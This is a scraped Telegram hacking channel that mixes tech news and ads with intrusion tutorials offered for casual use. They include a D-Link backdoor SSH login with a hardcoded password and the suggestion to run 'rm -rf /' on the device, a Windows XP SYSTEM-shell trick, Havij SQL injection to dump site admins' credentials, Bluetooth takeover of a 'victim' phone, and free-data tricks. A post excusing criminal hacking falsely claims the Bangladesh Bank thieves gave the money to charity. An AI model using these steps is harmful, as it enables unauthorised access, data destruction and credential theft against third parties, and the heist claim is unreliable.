Tech Byte
4.77K subscribers
254 photos
3 videos
87 files
192 links
Tech tricks, news, hacking tutorials and dark web guides.

Admin : @anonyguy
Download Telegram
Tech Byte pinned «​​Have a Telegram channel📢, group💬 or bot🤖 you want to get more followers👥 to? Or maybe it's your brand new YouTube channel, Instagram or Twitter fanpage? 👍I got you covered, I'll advertise your products on my Telegram platforms for a very affordable price…»
Microsoft Office 2019 Preview
x64 v16.0.9

Features:
Office Word
Office Excel
Office PowerPoint
Office Access
Outlook
One Note

@techBYTE
​​🔥 Run Kali Linux Natively On Your Windows 10 🔥


😁Great News For Hackers😁

Now you can download and install Kali Linux directly from the Microsoft App Store on Windows 10 just like any other application.

I know it sounds crazy, but it’s true!

Kali Linux, a very popular, free, and open-source Linux-based operating system widely used for hacking and penetration testing, is now natively available on Windows 10, without requiring dual boot or virtualization.

Kali Linux is the latest Linux distribution to be made available on the Windows App Store for one-click installation, joining the list of other popular distribution such as Ubuntu, OpenSUSE and SUSE Enterprise Linux.In Windows 10, Microsoft has provided a feature called “Windows Subsystem for Linux” (WSL) that allows users to run Linux applications directly on Windows.

“For the past few weeks, we’ve been working with the Microsoft WSL team to get Kali Linux introduced into the Microsoft App Store as an official WSL distribution, and today we’re happy to announce the availability of the ‘Kali Linux’ Windows application,” Kali Linux said while announcing the news.

How to Download and Run Kali Linux on Windows 10

If this is your first time using Windows Subsystem for Linux (WSL), you need to enable this optional Windows feature before getting the Kali Linux app.

Follow these simple steps to enable WSL:

• Navigate to Control Panel and go to “Apps and features”

• Select “Programs and Features” from the right panel

Click the “Turn Windows features on or off” from the left menu.

•Select the “Windows Subsystem for Linux” and save it

•Reboot your system

• You can even do the same by opening PowerShell as Administrator and running the following command and restart your computer.

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux

Now search for Kali Linux on Windows Store download it with just a single click. Once you launch the application, it automatically completes Kali installation and will open the console window.
For Airtel Kenya subscribers

Visit this link using an Airtel SIM card and watch the 30-sec ad to get 6MB free: 172.16.11.71

(Tip: Before playing the ad, open this link on 2 or 3 different ads and play the ad on all of them to get free 18MB of data)

Wakenya ni kisaidiana
Forwarded from RL advertisements
PremiAD

PremiAD is an advertising program through which Telegram channel owners can earn real money by posting advertisements on their channels.

https://t.me/joinchat/AAAAAEsQS7mbCH_NN6iiVw
Forwarded from RL channels
Facebook Research Program
Get paid for installing an app

Research conducted by the testing platform utest pays you for installing and keeping an app on your phone. The app monitors and collects usage data, all you need to do is register, install it and you're done.

• You will be paid $10 for the first 30days you keep the app installed and $5 after your first month
• You will also be paid $10 per month for each referral that signs up for the project after 30 days of you joining the program, for every month they participate
• Earn a $20 bonus per month for every five referrals that were also active in the program (e.g., if you have 10 referrals that were active in a given month, you will earn a $40 bonus that month; if you have 15, you will earn $60, etc.)
• Payments are made on the 15th of every month to your PayPal account.

The research started in April 2018 and is a limited time program, also, you register by getting referred by someone.

To get referred by me, send your e-mail address, country you live in and name to @romL3N. You will receive an e-mail giving you instructions on how to register.

Send the details to @romL3N
1.Metasploit
Metasploit is available for all major platforms including Windows, Linux, and OS X. Rather than calling Metasploit a collection of exploit tools, I’ll call it an infrastructure that you can utilize to build your custom tools. This free tool is one of the most popular cyber security tools around that allows you to locate vulnerabilities at different platforms. Metasploit is backed by more than 200,000 users and contributors that help you to get insights and uncover the weaknesses in your system.
This tool package lets you simulate real-world attacks to tell you about the weak points and finds them. As a penetration tester, it pinpoints the vulnerabilities with Nexpose closed-loop integration using Top Remediation reports. Using the open-source Metasploit framework, users can build their tools and take the best out of this multi-purpose hacking tool.
2. NMap
Nmap is available for all major platforms including Windows, Linux, and OS X. I think everyone has heard of this one, Nmap (Network Mapper) is a free open source utility for network exploration or security auditing. It was designed to Nmap rapidly scan large networks, although it works fine against single hosts. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It may be used to discover computers and services on a computer network, thus creating a “map” of the network. Nmap runs on most types of computers, and both console and graphical versions are available. Nmap is a fee and open source tool that can be used by beginners (-sT) or by pros alike (packet_trace). A very versatile tool, once you fully understand the results.
3. Acunetix WVS
Acunetix is available for Windows XP and higher. Acunetix is a web vulnerability scanner (WVS) that scans and finds out the flaws in a website that could prove fatal. This multi-threaded tool crawls a website and finds out malicious Cross-site Scripting, SQL injection, and other vulnerabilities. This fast and easy to use tool scans WordPress websites from more than 1200 vulnerabilities in WordPress.
Acunetix comes with a Login Sequence Recorder that allows one to access the password protected areas of web sites. The new AcuSensor technology used in this tool allows you to reduce the false positive rate. Such features have made Acunetix WVS a preferred hacking tools that you need to check out in 2018.
4.Wire Shark
This free and open source tool was originally named Ethereal. Wireshark also comes in a command-line version called TShark. This GTK+-based network protocol analyzer runs with ease on Linux, Windows, and OS X. Wireshark is a GTK+-based Wireshark network protocol analyzer or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers. Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams.
5.OCLHashcat
This useful hacking tool can be downloaded in different versions for Linux, OSX, and Windows. If password cracking is something you do on a daily basis, you might be aware of the free password cracking tool Hashcat. While Hashcat is a CPU-based password cracking tool, oclHashcat is its advanced version that uses the power of your GPU.
oclHashcat calls itself world’s fastest password cracking tool with world’s first and only GPGPU based engine. For using the tool, NVIDIA users require ForceWare 346.59 or later, and AMD users require Catalyst 15.7 or later.
This tool employs following attack modes for cracking:
Straight
Combination
Brute-force
Hybrid Dictionary + mask
Hybri
HACK OR DIE
how to hack a d-link modem
open a terminal on your linux machine [it doesnt work on windows]
mostly the ip of the router is
192.168.1.1 or 192.168.0.1
so pick one and lets begin
now type
ssh remotessh@192.168.1.1
type the backdoor password which is 5SaP9I26
congratulations!
an ssh shell will open
now you have root access on the modem
you can choose to format it by typing
rm -rf /
or restart it
shutdown -r -t1
or change the password
passwd -u root
whatever you do, just make sure u hv fun
~halo zorayo
Join us for more Hacking Tutorials @TechByte
If any pro/expert hacker reading it then you can skip on..
.
GUYS WE ARE TEACHING YOU ALL ETHCIAL HACKING/WHITE HAT HACKING IN SIMPLE AND EASY MANNER. SO WHY Do you all Waste time by Inboxing Scammers & frauds.
.
/ #CRYPTOGRAPHY .\
Mates; hope you are fine. Today we are going to discuss about cryptography, we have used this term lot in previous lessons, So now lets understand what is cryptography meant by. cryptography is about constructing and analyzing protocols that prevent third parties or the public from reading private messages, cryptography is a method for encryption of data, example you may heard about whatsapp end-to-end encryption, that means if you send Message to a person then only that person only can read it no other third party access in between you and your friend. Or else in simple words cryptography is method of converting readable text in computer language. So that computer can only read it, no other persons.
So friends this was a simple topic
.
.
.
B-) B-) We need More support B-) B-) Can you help us ? We are thinking to Share you much things. And we are expecting you all to share your friends and Increase Our Support. :-
Inbox us @anonyguy , @roml3n
Join us @TechByte
BOOK REVIEW
Hacking: The Art Of Exploitation
this is a book that i think is the final step to being a hacker
the difference between an intermediate hacker and an elite hacker is the fact that the elite hacker can write exploits while the other just understands the concepts
simply put
elite hacker = intermediate hacker + programmer/ coder
this book teaches how to make your own keyloggers, sniffers and password crackers
once you master this book, feel free to call yourself an elite hacker
feel free to browse the files section of the group to find and read it
looking forward to project halo
~halo Zorayo
SKIDS CORNER
HOW TO BECOME ADMIN OF WIN XP
privilege escalation exploit
1. open cmd
note the current time on the pc and add one minute to it.
in my case my time is 9:54 so i make it 9:55
2. now type
at 9:55 cmd.exe /interactive
3. wait for a minute, a new cmd shell will open. go to this shell and type
taskkill /im explorer.exe
and your files will disappear.
4.now type
explorer.exe
your files will reappear
but check the account name on top of the start menu, it will be something like
SYSTEM/
congratulations, u are root!
this is a skids tutorial on how to get root/admin access on win xp
enjoy!
~halo Zorayo
LINUX COMMANDS
pwd
pwd is a linux command that stands for current working directory
when you type this in a shell, you will see the current folder you have opened.
eg. root@kali> pwd
/bin
this means we are in the bin folder
ls
this one stands for list
it simply lists all the files and folders in the folder that you have opened
to see them just type ls
eg. root@kali> ls
bin var etc
this means there are three folders in our current folder
bin etc and var
but this does not show your hidden files [like the folder where you keep ur sensitive documents or porn]
;)
to see all files including hidden files add -al
eg. root@kali> ls -al
bin var etc porn
now u can see that the hidden porn folder has been added. busted!
cd
cd stands for change directory [thats another name for folder]
examples
root@kali> pwd
/root
so we r in a folder called root
> ls
var etc
there are two folders in root
>cd etc
now we change our folder to etc
>pwd
/root/etc
so now our folder is etc
stay tuned!
Questions? @anonyguy
some of questions you guys ask me in private chat are really very...
when you ask anything about coding or hacking, please ask realistic questions that will help your life.
please don ask unrealistic questions that have nothing to do with this group
examples
how to turn of someones phone by sending a whatsapp message
how to use c programming to code a table
how to hack an electric light pole with cmd
how to use python to turn a fridge into a microwave
please these questions will not give you any knowledge about coding or hacking.
people will just laugh at you
if you want to learn python or cmd then do so
then start hacking your light poles to see if that is possible.
~halo zorayo
@anonyguy
Stopping Redirection From google.com to google.co.in (Stopping Location based google)September 9, 2014
BY CYBERINTRUDER
Step1: Open the browser , type http://www.google.com/ncr

NCR stands for “No Country Redirect”

Now you can browse normally . you can see only http://www.google.com , it won’t redirect to location based google like http://www.google.co.in
__NOT FOR THE MONEY
__
one reason some of you have still not evolved to become hackers is that you think about how you will use your skills to hack banks and get quick money
forget money
when you start hacking, money will come on its own
one thing about hackers is that we are generous
we don think about being rich
we know the problems in our society and we use our skills to call the attention of the government to do something about it
such people are called hacktivists
this is why i don want you to classify people as blackhats
they do all those things to get the government to solve the problems in the country
the fact that they don approve of the way we do it doesnt make us blackhats [bad people]
in 2016, the bank of bangladesh was hacked. millions of dollars stolen. what did the hackers do with the money?
did they become rich? no
they donated [most] of the money to orphanages and charity organisations like people who needed heart surgery
its never about the money
its about helping the people around you
~halo zorayo
Hello friends
I found a way to answer
People who have modems and their modem Internet volume will be done
1. First, install the vip pro proxy or vpn pro, then connect to the modem that is full.
2-Then enter the More options or settings
Next, add this proxy to 185.143.233.210 on a vip or proxy with 80 or 8080 ports.
4. Then press the Connect button
5. If the filter is connected then the modem volume is hacked
Just Hack That Website, By Using ;) (Havji)
-------------------------------------------------------------------------------------------------------
.
Note: Only For n00b Purpose.>!!! :D
.
Just Follow these easy steps :-
.
1. First download havij from here
https://itsecteam. com/
.
2. Run Havij SQL Injection software and copy and paste
vulnerable website link
.
3. Now click in the “Analyze” Button
.
4. Then It shows some messages there. Be alert on it and be show patience for sometime to find it’s vulnerable and type of injection and if db server is mysql and it will find database name. Then after getting it’s database name like xxxx_xxxx
.
5. Then Move to another operation to find tables by clicking “tables” as there will be a figure shown to you in order to do so. Now click “Get tables”
Then wait some time if needed
.
6. After founded the tables, you can see there will be “users” Put mark on it and click in the ” get columns ” tab
.
7. In that Just put mark username and password and click “Get data”
.
8. Finally you've now got username and password of the admin…
.
Have your n00b day :D
.
#Have Your Old Fun Times
@TechByte
Just hack That Ugly Mobile, By Using Bluetooth:-
---------------------------------------------------------------------------------------------------------------------------------------
.
Note : Only For old Tea Purpose.>!!!!!
.
Bluetooth hack 2009 is gonna do the job for you ;)
Super Bluetooth hack 2009 is one of the most downloaded Bluetooth
hacking tools. Super bluetooth hack 2009 is used for mobile based Symbian operating system to hack & manage any mobile near you, which is vulnerable to Bluetooth-hacking attack.
.
Download This Bluetooth hack: - https:// www. mobicreed. com/wpcontent/
uploads/2009/05/ftp_btmobicreedcom. rar (No spaces, please)
.
Procedure To Install Super Bluetooth Hack 2009
.
1) Download to PC
.
2) Transfer it to your Bluetooth enabled mobile.
.
3) Run the Installer (Remember, You must have Java enabled phone for installing it) ;)
.
4) Finds it and you will be able to run program
.
5) Select the language and configure it.
.
6) Click > Connection
.
7) Click > Search Devices
.
8) Choose the “Victim”
.
9) And start managing with following hacks mentioned with Bluetooth.
.
#Have Your n00b day !!!
.
#Old Tea Moments.